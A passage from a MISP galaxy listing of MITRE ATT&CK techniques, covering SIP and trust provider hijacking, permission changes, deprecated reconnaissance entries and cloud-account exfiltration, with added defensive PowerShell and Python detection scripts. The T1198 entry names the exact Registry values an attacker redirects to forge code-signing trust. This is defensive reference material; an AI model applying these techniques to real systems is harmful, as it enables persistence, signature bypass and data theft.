  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

  • Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

  • Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
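Both the IFEO entry above (T1183) and this one (T1198) come down to a handful of Registry values a defender can enumerate: <code>Debugger</code>, <code>GlobalFlag</code> and <code>MonitorProcess</code> for IFEO and silent process exit, and the DLL/function pairs under the <code>CryptSIPDll*</code> and <code>FinalPolicy</code> keys for SIPs and trust providers. The following read-only audit is an added example and is not part of the MISP galaxy, ATT&CK or any cited project; it walks all of those locations and reports entries worth reviewing. It assumes the trust provider values are stored as <code>$DLL</code> and <code>$Function</code> on current Windows builds (the page names them <code>DLL</code> and <code>Function</code>), so both spellings are handled, and it assumes the audit is run from an elevated Windows PowerShell session.

```powershell
# Added example, not part of the MISP galaxy or ATT&CK: read-only audit of the
# IFEO, SilentProcessExit, SIP and trust provider Registry locations described
# in T1183 and T1198. Run elevated. Review every finding by hand: a few
# legitimate IFEO and SIP entries exist on a stock system.

$ifeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)
$silentExitRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
$sipRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg',
    'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
)
$trustRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy'
)

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding($Category, $Key, $Name, $Data) {
    $findings.Add([pscustomobject]@{ Category = $Category; Key = $Key; Value = $Name; Data = $Data })
}

# Turn a Registry DLL reference (bare name, %ENV% path, or full path) into a path.
function Resolve-DllPath($raw) {
    $p = [Environment]::ExpandEnvironmentVariables($raw)
    if ([IO.Path]::IsPathRooted($p)) { return $p }
    $candidate = Join-Path $env:windir "System32\$p"
    if (Test-Path $candidate) { return $candidate }
    return $p
}

# 1. IFEO: any Debugger value, or a GlobalFlag with the silent-exit bit (0x200 = 512) set.
foreach ($root in $ifeoRoots) {
    if (-not (Test-Path $root)) { continue }
    foreach ($k in Get-ChildItem $root) {
        $v = Get-ItemProperty $k.PSPath
        if ($v.PSObject.Properties['Debugger']) {
            Add-Finding 'IFEO Debugger' $k.PSChildName 'Debugger' $v.Debugger
        }
        if ($v.PSObject.Properties['GlobalFlag'] -and ($v.GlobalFlag -band 0x200)) {
            Add-Finding 'IFEO silent-exit flag' $k.PSChildName 'GlobalFlag' ('0x{0:X}' -f $v.GlobalFlag)
        }
    }
}

# 2. SilentProcessExit: any MonitorProcess value is a program launched when the target exits.
if (Test-Path $silentExitRoot) {
    foreach ($k in Get-ChildItem $silentExitRoot) {
        $v = Get-ItemProperty $k.PSPath
        if ($v.PSObject.Properties['MonitorProcess']) {
            Add-Finding 'SilentProcessExit monitor' $k.PSChildName 'MonitorProcess' $v.MonitorProcess
        }
    }
}

# 3. SIP and trust provider DLLs: flag any that live outside %windir%, are missing,
#    or fail local Authenticode validation. Caveat: once a SIP is hijacked, local
#    signature checks can no longer be trusted, so the SHA-256 is recorded for
#    comparison against a known-good system.
foreach ($root in ($sipRoots + $trustRoots)) {
    if (-not (Test-Path $root)) { continue }
    foreach ($k in Get-ChildItem $root) {
        $v = Get-ItemProperty $k.PSPath
        # SIP keys use Dll/FuncName; trust provider keys use $DLL/$Function (assumption, see lead-in).
        $dll  = if ($v.PSObject.Properties['Dll'])      { $v.Dll }      else { $v.'$DLL' }
        $func = if ($v.PSObject.Properties['FuncName']) { $v.FuncName } else { $v.'$Function' }
        if (-not $dll) { continue }
        $path = Resolve-DllPath $dll
        $inWindows = $path.StartsWith($env:windir, [StringComparison]::OrdinalIgnoreCase)
        if (Test-Path $path) {
            $sig  = (Get-AuthenticodeSignature $path).Status
            $hash = (Get-FileHash -Algorithm SHA256 $path).Hash
        } else { $sig = 'FileMissing'; $hash = '' }
        if (-not $inWindows -or $sig -ne 'Valid') {
            $where = '{0}\{1}' -f (Split-Path $root -Leaf), $k.PSChildName
            Add-Finding 'SIP/TrustProvider' $where "$dll!$func" "path=$path sig=$sig sha256=$hash"
        }
    }
}

$findings | Format-Table -AutoSize -Wrap
```

The audit is deliberately conservative about what it trusts: because a hijacked <code>CryptSIPDllVerifyIndirectData</code> or <code>FinalPolicy</code> DLL makes <code>Get-AuthenticodeSignature</code> itself unreliable on that host, the resolved DLL path and hash are the values to compare against a clean reference image rather than the local "Valid" status alone. As the Note above says, the same redirection can be achieved through DLL search order hijacking without touching the Registry, so this check complements, and does not replace, monitoring of the DLLs that load into signature-validating processes.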

The tag is: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1198"

Table 5424. Table References

Links

http://www.entrust.net/knowledge-base/technote.cfm?tn=8165

https://attack.mitre.org/techniques/T1198

https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)

https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files

https://github.com/mattifestation/PoCSubjectInterfacePackage

https://msdn.microsoft.com/library/ms537359.aspx

https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

File and Directory Permissions Modification - T1222

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222"

Table 5425. Table References

Links

https://attack.mitre.org/techniques/T1222

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior

https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware

https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/

https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Assess leadership areas of interest - T1224

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1224).

Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)

The tag is: misp-galaxy:mitre-attack-pattern="Assess leadership areas of interest - T1224"

Table 5426. Table References

Links

https://attack.mitre.org/techniques/T1224

Determine 3rd party infrastructure services - T1284

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1284).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284"

Determine 3rd party infrastructure services - T1284 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260" with estimative-language:likelihood-probability="almost-certain"

Table 5427. Table References

Links

https://attack.mitre.org/techniques/T1284

Determine highest level tactical element - T1243

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1243).

From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine highest level tactical element - T1243"

Table 5428. Table References

Links

https://attack.mitre.org/techniques/T1243

Determine secondary level tactical element - T1244

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1244).

The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine secondary level tactical element - T1244"

Table 5429. Table References

Links

https://attack.mitre.org/techniques/T1244

Attack PC via USB Connection - T1427

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC. (Citation: Wang-ExploitingUSB) (Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

The tag is: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427"

Table 5430. Table References

Links

http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/

http://dl.acm.org/citation.cfm?id=1920314

https://attack.mitre.org/techniques/T1427

https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html

Determine centralization of IT management - T1285

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1285).

This involves determining whether a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)

The tag is: misp-galaxy:mitre-attack-pattern="Determine centralization of IT management - T1285"

Table 5431. Table References

Links

https://attack.mitre.org/techniques/T1285

Determine external network trust dependencies - T1259

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1259).

Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)

The tag is: misp-galaxy:mitre-attack-pattern="Determine external network trust dependencies - T1259"

Table 5432. Table References

Links

https://attack.mitre.org/techniques/T1259

Analyze organizational skillsets and deficiencies - T1297

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1297).

Understanding organizational skillsets and deficiencies could provide insight into weaknesses in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297"

Analyze organizational skillsets and deficiencies - T1297 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300" with estimative-language:likelihood-probability="almost-certain"

Table 5433. Table References

Links

https://attack.mitre.org/techniques/T1297

Analyze architecture and configuration posture - T1288

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1288).

An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze architecture and configuration posture - T1288"

Table 5434. Table References

Links

https://attack.mitre.org/techniques/T1288

Analyze organizational skillsets and deficiencies - T1289

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).

Analyze the strengths and weaknesses of the target to identify potential areas on which to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1289"

Analyze organizational skillsets and deficiencies - T1289 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300" with estimative-language:likelihood-probability="almost-certain"

Table 5435. Table References

Links

https://attack.mitre.org/techniques/T1289

Leverage compromised 3rd party resources - T1375

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Leverage compromised 3rd party resources - T1375"

Table 5436. Table References

Links

https://attack.mitre.org/techniques/T1375

Procure required equipment and software - T1335

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).

An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)

The tag is: misp-galaxy:mitre-attack-pattern="Procure required equipment and software - T1335"

Table 5437. Table References

Links

https://attack.mitre.org/techniques/T1335

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

SSL certificate acquisition for domain - T1337

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1337).

Certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user into trusting the domain (e.g., vvachovia instead of [Wachovia](https://www.wellsfargo.com/about/corporate/wachovia) — homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)

The tag is: misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for domain - T1337"

Table 5438. Table References

Links

https://attack.mitre.org/techniques/T1337

https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Confirmation of launched compromise achieved - T1383

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)

The tag is: misp-galaxy:mitre-attack-pattern="Confirmation of launched compromise achieved - T1383"

Table 5439. Table References

Links

https://attack.mitre.org/techniques/T1383

App Delivered via Email Attachment - T1434

The application is delivered as an email attachment.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Email Attachment - T1434"

App Delivered via Email Attachment - T1434 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5440. Table References

Links

https://attack.mitre.org/techniques/T1434

Create or Modify System Process - T1543

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)

The tag is: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543"

Table 5441. Table References

Links

https://attack.mitre.org/techniques/T1543

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://technet.microsoft.com/en-us/library/cc772408.aspx

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

Build and configure delivery systems - T1347

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).

Delivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Build and configure delivery systems - T1347"

Table 5442. Table References

Links

https://attack.mitre.org/techniques/T1347

Automated system performs requested action - T1384

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Users may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)

The tag is: misp-galaxy:mitre-attack-pattern="Automated system performs requested action - T1384"

Table 5443. Table References

Links

https://attack.mitre.org/techniques/T1384

Exfiltration Over Other Network Medium - T1438

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1438"

Table 5444. Table References

Links

https://attack.mitre.org/techniques/T1438

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Eavesdrop on Insecure Network Communication - T1439

If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)

The tag is: misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439"

Table 5445. Table References

Links

https://attack.mitre.org/techniques/T1439

https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

Distribute malicious software development tools - T1394

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1394).

An adversary could distribute malicious software development tools (e.g., compiler) that hide malicious behavior in software built using the tools. (Citation: PA XcodeGhost) (Citation: Reflections on Trusting Trust)

The tag is: misp-galaxy:mitre-attack-pattern="Distribute malicious software development tools - T1394"

Table 5446. Table References

Links

https://attack.mitre.org/techniques/T1394

Transfer Data to Cloud Account - T1537

Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
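The detection gap described above closes once the control-plane calls that grant another account access to a snapshot or image are alerted on. The following example is added here and is not MITRE's, MISP's or any cloud provider's code: it scans constructed CloudTrail-style events for EBS snapshot, AMI and RDS snapshot sharing and reports every grant to an account outside a trusted set (or to the public "all" group). The request-parameter layout mirrors what CloudTrail records for these calls, including its lower-cased first letter in "dBSnapshotIdentifier"; verify the field names against your own logs before deploying.

```python
import json

# Accounts belonging to the organisation; anything else is external.
# Constructed for this example.
TRUSTED_ACCOUNTS = {"111111111111", "222222222222"}

def _items(obj, *path):
    """Walk nested dicts and return the 'items' list at the end, or []."""
    for key in path:
        obj = obj.get(key, {}) if isinstance(obj, dict) else {}
    return obj.get("items", []) if isinstance(obj, dict) else []

def external_grants(event: dict):
    """(resource, grantee) pairs this API call grants to an account outside
    TRUSTED_ACCOUNTS or to the public 'all' group."""
    name = event.get("eventName")
    req = event.get("requestParameters") or {}
    grants = []
    if name == "ModifySnapshotAttribute":                  # EBS snapshot share
        for it in _items(req, "createVolumePermission", "add"):
            grants.append((req.get("snapshotId"),
                           it.get("userId") or f"group:{it.get('group')}"))
    elif name == "ModifyImageAttribute":                   # AMI share
        for it in _items(req, "launchPermission", "add"):
            grants.append((req.get("imageId"),
                           it.get("userId") or f"group:{it.get('group')}"))
    elif name == "ModifyDBSnapshotAttribute":              # RDS snapshot share
        for acct in req.get("valuesToAdd") or []:
            grants.append((req.get("dBSnapshotIdentifier"), acct))
    return [(res, who) for res, who in grants if who not in TRUSTED_ACCOUNTS]

def scan(lines):
    """Parse one JSON event per line and report every external grant."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        for res, who in external_grants(ev):
            findings.append({"time": ev.get("eventTime"),
                             "actor": (ev.get("userIdentity") or {}).get("arn"),
                             "source_ip": ev.get("sourceIPAddress"),
                             "resource": res, "shared_with": who})
    return findings

# Constructed events: one share to an unknown account, one to a trusted
# account, one AMI made public, one RDS snapshot share, one unrelated call.
SAMPLE_LOG = """
{"eventTime":"2024-03-01T02:14:09Z","eventName":"ModifySnapshotAttribute","sourceIPAddress":"198.51.100.23","userIdentity":{"arn":"arn:aws:iam::111111111111:user/deploy"},"requestParameters":{"snapshotId":"snap-0a1b2c3d4e5f67890","attributeType":"CREATE_VOLUME_PERMISSION","createVolumePermission":{"add":{"items":[{"userId":"999999999999"}]}}}}
{"eventTime":"2024-03-01T02:15:41Z","eventName":"ModifySnapshotAttribute","sourceIPAddress":"10.20.30.40","userIdentity":{"arn":"arn:aws:iam::111111111111:role/backup"},"requestParameters":{"snapshotId":"snap-0fedcba9876543210","attributeType":"CREATE_VOLUME_PERMISSION","createVolumePermission":{"add":{"items":[{"userId":"222222222222"}]}}}}
{"eventTime":"2024-03-01T02:16:03Z","eventName":"ModifyImageAttribute","sourceIPAddress":"198.51.100.23","userIdentity":{"arn":"arn:aws:iam::111111111111:user/deploy"},"requestParameters":{"imageId":"ami-0123456789abcdef0","launchPermission":{"add":{"items":[{"group":"all"}]}}}}
{"eventTime":"2024-03-01T02:18:27Z","eventName":"ModifyDBSnapshotAttribute","sourceIPAddress":"198.51.100.23","userIdentity":{"arn":"arn:aws:iam::111111111111:user/deploy"},"requestParameters":{"dBSnapshotIdentifier":"prod-db-final","attributeName":"restore","valuesToAdd":["999999999999"]}}
{"eventTime":"2024-03-01T02:19:00Z","eventName":"DescribeSnapshots","sourceIPAddress":"10.20.30.40","userIdentity":{"arn":"arn:aws:iam::111111111111:role/backup"},"requestParameters":{}}
"""
```

Running scan(SAMPLE_LOG.splitlines()) yields three findings, all from the same principal and source address. Sharing to a trusted account is deliberately not reported; the noisier but safer variant alerts on every grant and lets the analyst triage.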

The tag is: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537"

Table 5447. Table References

Links

https://attack.mitre.org/techniques/T1537

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html

https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview

https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature

https://www.justice.gov/file/1080281/download

Review logs and residual traces - T1358

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1358).

Execution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. (Citation: EDB-39007) (Citation: infosec-covering-tracks)

The tag is: misp-galaxy:mitre-attack-pattern="Review logs and residual traces - T1358"

Table 5448. Table References

Links

https://attack.mitre.org/techniques/T1358

Runtime code download and execution - T1395

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Runtime code download and execution - T1395"

Table 5449. Table References

Links

https://attack.mitre.org/techniques/T1395

Test malware to evade detection - T1359

